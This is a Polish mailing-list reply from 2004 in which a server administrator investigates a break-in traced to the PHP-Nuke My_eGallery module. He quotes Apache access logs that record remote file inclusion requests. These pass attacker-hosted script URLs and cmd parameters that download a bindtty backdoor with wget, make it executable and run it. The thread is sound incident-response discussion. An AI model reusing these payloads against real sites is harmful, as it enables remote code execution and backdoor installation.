Re: debian stable, apache i http://geocities.com/s3xmelayu/bindtty.c

[Krzysztof Jóźwiak <kjozwiak@laser.pl>]

Dnia wto 17. lutego 2004 16:41, Tomasz T. Ciaszczyk napisał:
> Witam,
>
> Dnia wto, lut 17, 2004 at 03:27:29 CET, Krzysztof Jóźwiak napisał:
> > > BTW odpalić ten programik może każdy user, nie musi się włamywać.
> >
> > no ale musi miec shella, no chyba ze ftpem tez podłoży...
>
> nie.. wystarczy ze bedzie kiepsko napisany site w phpie, ktory bedzie
> umozliwial otwieranie stron zewnetrznych.

no fakt, php-nuke zostal wytropiony jako winowajca...

> > dalej podejrzewam ze jest to pewnie zle skonfigurowany apache (albo nie
> > daj boze dziurawy)...
>
> raczej php.. poszukaj w logach chlapacza (access_logi) czy nie miales
> getow na zewnetrzne urle
>
znowu lamerskie pytanie:
ten get ponizej to musze wykonać z jakiejs lewej strony czy bezpośrednio 
mechanizm zostal wykorzystany? 

/xxx-access_log:219.95.38.19 - - [07/Feb/2004:15:26:39 +0100]
"GET /modules/My_eGallery/public/url HTTP/1.1" 404 236 
"http://www.xxx/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/pillow4sleeping/a.txt?&cmd=bindtty"; 
"Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
./xxx-access_log:219.95.38.19 - - [07/Feb/2004:15:26:41 +0100] 
"GET 
/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/pillow4sleeping/a.txt?&cmd=bindtty 
HTTP/1.1" 200 4531 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; 
DigExt)"
./xxx-access_log:219.92.194.3 - - [11/Feb/2004:09:41:39 +0100] 
"GET 
/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/s3xmelayu/a.txt?&cmd=bindtty 
HTTP/1.1" 200 4472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
./xxx-access_log:219.92.194.3 - - [11/Feb/2004:09:41:42 +0100] 
"GET /modules/My_eGallery/public/url HTTP/1.1" 404 236 
"http://www.xxx/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/s3xmelayu/a.txt?&cmd=bindtty"; 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
./xxx-access_log:202.155.92.188 - - [13/Feb/2004:17:49:28 
+0100] "GET 
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20/var/tmp;wget%20renjana.ws/~toa/bindtty 
HTTP/1.1" 200 1151 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
./xxx-access_log:202.155.92.188 - - [13/Feb/2004:17:49:50 
+0100] "GET 
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20/var/tmp;chmod%20755%20bindtty;./bindtty 
HTTP/1.1" 200 817 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
./xxx-access_log:218.208.221.86 - - [15/Feb/2004:06:19:24 
+0100] "GET /modules/My_eGallery/public/url HTTP/1.1" 404 236 
"http://www.xxx/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/pillow4sleeping/a.txt?&cmd=bindtty"; 
"Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
./xxx-access_log:218.208.221.86 - - [15/Feb/2004:06:19:24 
+0100] "GET 
/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.geocities.com/pillow4sleeping/a.txt?&cmd=bindtty 
HTTP/1.1" 200 4495 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; 
DigExt)"
 


>
> Pozdrawiam,
> Tomasz T. Ciaszczyk

-- 
Pozdrawiam	
	Krzysztof Jóźwiak